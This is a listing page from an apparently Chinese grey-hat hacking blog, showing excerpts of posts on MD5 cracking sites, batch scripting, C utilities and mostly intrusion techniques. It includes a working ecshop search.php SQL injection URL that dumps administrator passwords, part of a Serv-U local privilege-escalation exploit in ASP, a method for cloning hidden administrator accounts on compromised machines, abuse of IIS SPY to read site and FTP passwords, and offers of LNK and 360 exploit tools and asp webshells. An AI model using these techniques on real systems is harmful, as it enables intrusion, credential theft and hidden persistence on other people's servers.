• 1
预览模式: 普通 | 列表

md5 在线破解

NO.1
http://www.md5decrypter.co.uk/
很棒,据说数据量为130亿条,个人查询下来感觉不错,很多国内的收费数据在上面都可以免费查到。
xfyy888这个数据在国内三个网站上都是需要付费的,此站可以查询到。
注:这个站的验证码是区分大小写的,注意一下。

查看更多...

Tags: md5

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7872

批处理高级教程

第一章 批处理基础
第一节 常用批处理内部命令简介
1、REM 和 ::
2、ECHO 和 @
3、PAUSE
4、ERRORLEVEL
5、TITLE
6、COLOR
7、mode 配置系统设备
8、GOTO 和 :
9、FIND
10、START
11、assoc 和 ftype
12、pushd 和 popd
13、CALL
14、shift
15、IF
16、setlocal 与 变量延迟
17、ATTRIB 显示或更改文件属性
第二节 常用特殊符号
1、@ 命令行回显屏蔽符
2、% 批处理变量引导符
3、> 重定向符
4、>> 重定向符
5、<、>&、<& 重定向符
6、| 命令管道符
7、^ 转义字符
8、& 组合命令
9、&& 组合命令
10、|| 组合命令 11、"" 字符串界定符
12、, 逗号
13、; 分号
14、() 括号
15、! 感叹号

查看更多...

Tags: 批处理

分类:下载专区 | 固定链接 | 评论: 2 | 查看次数: 6370

lnk漏洞利用工具



前言
windows的shell32在处理控制面板程序的快捷方式文件时,存在一个漏洞,可以加载硬盘上的任意DLL文件,即可执行任意代码。


漏洞文件的生成
到“控制面板”下面,右键点“显示”,点“创建快捷方式”,把快捷方式创建在桌面上。然后在桌面用WinHex打开“显示.lnk”文件。

查看更多...

Tags: lnk 漏洞 利用

分类:下载专区 | 固定链接 | 评论: 0 | 查看次数: 6777

账户克隆原理介绍

 


    相信大家都用过克隆帐户吧。无论是用工具还是用手工,克隆帐户无疑是隐藏帐户的最好选择。但是看见网上的文章都讲的特别麻烦。这样
那样的。其实克隆帐户很简单。就是复制administrator的注册表项。本篇文章针对已经使用过克隆的用户,不针对对克隆帐户一无所知者。
我只讲述下克隆的原理和方法。希望对大家有所启发。


原理:我们的帐户在注册表里都有他相应的键值,具体在 “[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users ”administrator 的
项为 “000001F4”下面有 2个二进制值 一个 是“F”一个是“V”。我一般克隆的都是 Guest用户,所以我就拿这个克隆这个用户做例子,
克隆其他用户方法相同。Guest的项为 “000001F5”。其他用户所对应的项可以从 “[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\
Users\Names”下查看。我们所要做的就是把“1F4”下的“F”和“V”值复制到“1F5”下的对应值里。这就是所说的克隆帐户。


1 简单克隆:
    a,原理:只复制“F”值。这样克隆出来的帐户隐蔽性比完全克隆(一会要说到)要低些,但是对自己方便些。如果肉鸡的管理员不是
太厉害的话,建议你用这个方法。这样克隆出来的用户如果登陆上去,所用的桌面了什么的都是administrator的,也就是说你在系统里的
文件“C:\Documents and Settings\Administrator”和admin是一样的。而非以前的“C:\Documents and Settings\Guest”。但是在
“query user”和“终端服务管理器”里面你所登陆的用户还是“Guest”,还有就是用命令“net localgroup administrators”还是可以
看出Guest是管理员来,这就是我所说的隐蔽性比完全克隆要低些。但是在net下,和用户管理中都看不出Guest用户有什么问题。

查看更多...

Tags: 账户 克隆

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6077

防止aspx木马的IIS SPY变态功能

如果服务器支持aspx语言,而且被上传了aspx木马,利用木马里面的IIS SPY 功能,可以读出IIS里面的所有用户的密码,包括用IIS做FTP的,也能读出所有用户的FTP的用户名和密码,真是太变态了。

下面讲一下如何防止木马使用iis spy 功能。

C:\WINDOWS\system32\activeds.tlb 找到此文件,取消users权限即可。

回收一下进程,再用木马自己测试一下,是否已经不能读取了? 提示"加载类型库/DLL 时出错"

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8046

mylcx 穿墙版

写的很匆忙很乱,可能有些地方会有问题。

说一下用法吧

-slave 和-listen 两个参数同lcx就不多说了,或者参考我的另一偏文章

http://www.zeroplace.cn/article.asp?id=441

查看更多...

分类:socket编程 | 固定链接 | 评论: 2 | 查看次数: 8225

提权之iis spy利用

或许用过aspx大马的人知道一般aspx大马都有一个功能叫做"iis spy",它的作用就是列出服务器上面所有网站的信息,包括用户名,密码,路径以及捆绑的域名。

一般我们要是做旁注的时候只需要看目标网站在哪个路径下面然后尝试跳转过去或者cacls改下权限(我用的前一个服务器竟然就有这样的问题,直接cacls就可以修改权限,我自己给自己送了个webshell竟然还可以旁别人的,着实被恶心一下。)。

而且很多情况下,iis密码是乱码的,这我没有仔细研究过是不是随即产生的。但要是密码不是乱码的话你就要注意了,说不定这个密码和用户名就可以用来登陆ftp。不妨试下。上次一个shell把我深深地雷到了,管理员的密码竟然也这样暴露在阳光下。操到3389里登陆,提权都免了。

iis spy的作用主要就这两个了。

Tags: 提权 iis

分类:网络安全 | 固定链接 | 评论: 1 | 查看次数: 7805

base64编码/解码函数 c语言

  1. /* base64编码函数 */

  2. int base64(char *s,char *d)
  3. {
  4. char CharSet[64]={
  5. 'A','B','C','D','E','F','G','H',
  6. 'I','J','K','L','M','N','O','P',
  7. 'Q','R','S','T','U','V','W','X',
  8. 'Y','Z','a','b','c','d','e','f',
  9. 'g','h','i','j','k','l','m','n',
  10. 'o','p','q','r','s','t','u','v',
  11. 'w','x','y','z','0','1','2','3',
  12. '4','5','6','7','8','9','+','/'};

查看更多...

分类:c/c++ | 固定链接 | 评论: 0 | 查看次数: 8197

CreateProcess实例和TerminateProcess实例

这个实例编写了两个函数,分别叫做shell和kill(用到的api分别是CreateProcess和,TerminateProcess).shell函数的参数是一个你要执行的可执行文件的名称,当然只要文文件格式符合exe的pe格式就可以(比如你可以把一个calc.exe改名为calc.jpg用这个函数照样可以执行),然后他返回新创建的这个进程的pid。

第二个函数的作用是结束一个进程,你只须传入这个进程的pid即可。若成功返回true, 否则返回false。

很简单吧。

#include <windows.h>

查看更多...

分类:c/c++ | 固定链接 | 评论: 1 | 查看次数: 16070

serv-u7,8,9本地提权exp

serv-u提权使用前提:管理员没有设置本地管理密码.如果设置了,可以在serv-u安装目录\Users\Local Administrator Domain\.Archive里面找到一个MD5值,是前两位随机字符+MD5.破出来后减去前两位随机字符就是本地管理密码.如果管理员没有设置,在exp的第一页随便填什么密码都可以进去.建立好域的时候要等半分钟才能登陆.不然会出现错误.

<style type="text/css">
<!--
body,td,th {
font-size: 12px;
}
-->
</style>
<%
Function httpopen(neirong,fangshi,dizhi,refer,cookie)
set Http=server.createobject("Microsoft.XMLHTTP")
Http.open fangshi,dizhi,false
Http.setrequestheader "Referer",refer
Http.setrequestheader "Content-type","application/x-www-form-urlencoded"
Http.setrequestheader "Content-length",len(neirong)
Http.setrequestheader "User-Agent","Serv-U"
Http.setrequestheader "x-user-agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
If cookie<>"" then
Http.setrequestheader "Cookie",cookie
End If
Http.send neirong
httpopen=bytes2BSTR(Http.responseBody)
set Http=nothing
end Function

Function getmidstr(L,R,str)
int_left=instr(str,L)
int_right=instr(str,R)
If int_left>0 and int_right>0 Then
getmidstr=mid(str,int_left+len(L),int_right-int_left-len(L))
Else
getmidstr="执行的字符串中不包含“"&L&"”或“"&R&"”"
End If
end Function

Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr (CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>
<%
    ''----------自定义参数开始-----------

查看更多...

Tags: 提权 本地

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6246

中转注入原理

呵呵,又来骗流量了。说起来真的是孤陋寡闻了,我听说中转注入这个方法大概是在几个月前,但这位寂寞的刺猬大侠好象在07年或者更早就弄出了这东西。刚听说中转注入的时候觉得很好奇,以为又出什么新招了,看了代码才知道原来所谓的中转注入其实就是传说当中的cookie注入。但cookie注入很烦琐,而且基本上只能用手工,所以我觉得这个中转注入的想法真的很巧妙,巧妙地把原来无法放阿D或者明小子上注的cookie中转到了url上面。

既然骗了人来这里看我写的这个无聊的文章,那我也稍微负点责好了,简单的说下原理。其实了解cookie注入的同学应该都明白的。

我不知道大家遇到cookie注入的时候是怎么注的,反正我是用的明小子里面带的浏览器,那个有个修改cookie的功能。然后再结合一下站长工具里面的一个escape加密工具就可以注入了。要是能直接暴出用户密码当然最好,要是暴不出真的就是一件非常烦琐的事情了。

比如有这么一个cookie注入点

查看更多...

Tags: 注入

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 12835

js实现无刷新更新数据

程序设计中会经常碰到一种情况,就是事先无法得知用户会需要哪些数据,必须根据用户选择后再从服务器重新提取数据后反馈给用户。比如一简单的情况,用户选择省份以后,我们立即会在市里边将这个省的所有市重新显示出来。这种
程序设计中会经常碰到一种情况,就是事先无法得知用户会需要哪些数据,必须根据用户选择后再从服务器重新提取数据后反馈给用户。比如一简单的情况,用户选择省份以后,我们立即会在市里边将这个省的所有市重新显示出来。这种情况一般需要将整个页面刷新后才可以重新读取,但这样不仅效率不高外,也显得不太优雅。其实用javascript结合微软件的XMLHTTP对象,我们可以不用刷新,“稍稍”的就可以将数据从服务器上读取出来,显得既专业,又高效。

  下面我们就以一个验证用户是否被注册的情况来演示这种技术。 

'程序设计:环球万维,专业域名注册,虚拟主机服务商 
'网址:http://www.netInter.cn
'此程序为环球万维原创程序,所以如果您需转载,请注明出处,谢谢。
'以上信息与文章正文是不可分割的一部分,所以如果您要转载本文章,您必须保留以上信息.

  1.首先在服务器上建立一个CheckUser.asp文件,用来检测用户是否存在,根据用户是否存在分别反馈0和1

u_name=Request.QueryString("u_name") 
if u_name 存在 then 
Response.write "0" 
else 
Response.write "1" 
end if

    2.客户端HTML设计:

一、JavaScript代码:

<script language=javascript> 
function check_user_exists(form){ 
u_name=form.u_name.value; 
if (u_name==null||u_name==''){ 
alert("请您输入用户名"); 
return false; 

infoBoard=document.getElementById("checkInfo"); 
infoBoard.innerText='查询中...'; 
myurl=location.protocol+"//"+location.hostname+"/CheckUser.asp?u_name="+u_name; 
retCode=openUrl(myurl); 
switch(retCode){ 
case "-2": 
infoBoard.innerHTML='<font color=red>抱歉</font>,查询失败';break; 
case "1": 
infoBoard.innerHTML='<font color=red>恭喜</font>,'+u_name+'可以使用';break; 
case "0": 
infoBoard.innerHTML='<font color=red>抱歉</font>,用户名'+u_name+'已经被使用'; 

return; 

function openurl(/url){ 
var objxml=new ActiveXObject("Microsoft.XMLHttp") 
objxml.open("GET",url,false); 
objxml.send(); 
retInfo=objxml.responseText; 
if (objxml.status=="200"){ 
return retInfo; 

else{ 
return "-2"; 


</script>


二、HTML表单设计:

<form name=form1 action="XXXX.asp" method="post"> 
<input type=text name=u_name><span id="checkInfo"></span><input type=button name=checkuser value="检测用户是否存在" onClick="check_user_exists(this.form);"> 
</form>


经过以上三步,一个不需要页面刷新的数据更新程序就完成了,按此方法,可以实现很多会很酷的应用:)
分类:PHP教程 | 固定链接 | 评论: 0 | 查看次数: 6313

360漏洞利用工具

360暴的那个漏洞已经很长时间了,但据我所知很多服务器其实并没有补上这个漏洞。原因是多方面的,可能是防火墙或者是设置,反正最终导致的是360漏洞没有被补上,至少也是很多机子都没有补上。废话不说了,献上漏洞利用工具一个。

原理什么的就不多说了,网上太多太多了。

说下用法把

usage:

查看更多...

分类:网络安全 | 固定链接 | 评论: 1 | 查看次数: 14611

宽字符处理函数函数与普通函数对照表

宽字符处理函数函数与普通函数对照表

只要看见“W”就是宽的意思,左边wchar_t,右边char


字符分类:
宽字符函数            普通C函数            描述
iswalnum()             isalnum()              测试字符是否为数字或字母
iswalpha()             isalpha()              测试字符是否是字母
iswcntrl()                iscntrl()                 测试字符是否是控制符
iswdigit()                isdigit()                测试字符是否为数字
iswgraph()             isgraph()              测试字符是否是可见字符
iswlower()              islower()              测试字符是否是小写字符
iswprint()               isprint()               测试字符是否是可打印字符
iswpunct()             ispunct()            测试字符是否是标点符号
iswspace()             isspace()             测试字符是否是空白符号
iswupper()             isupper()            测试字符是否是大写字符
iswxdigit()              isxdigit()              测试字符是否是十六进制的数字

大小写转换:
宽字符函数            普通C函数            描述
towlower()             tolower()            把字符转换为小写
towupper()            toupper()             把字符转换为大写

查看更多...

分类:c/c++ | 固定链接 | 评论: 0 | 查看次数: 6228

ecshop search.php的注入漏洞-爆出管理员密码!

 

利用语句:
search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319pTXcopyd-code

解决方案
search.php
大概300 源
            if (is_not_null($val) )
修改为
            if (is_not_null($val) && is_numeric($key))

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6865

asp大马

第一款:心动吧asp大马

asp大马asp大马asp大马asp大马asp大马

第二款:暗组新出的一个asp大马

asp大马asp大马asp大马asp大马

查看更多...

Tags: asp 大马 下载

分类:下载专区 | 固定链接 | 评论: 0 | 查看次数: 11162
  • 1
博主QQ: 友情链接请找我
QQ群: 灰色档案
返回顶部 关闭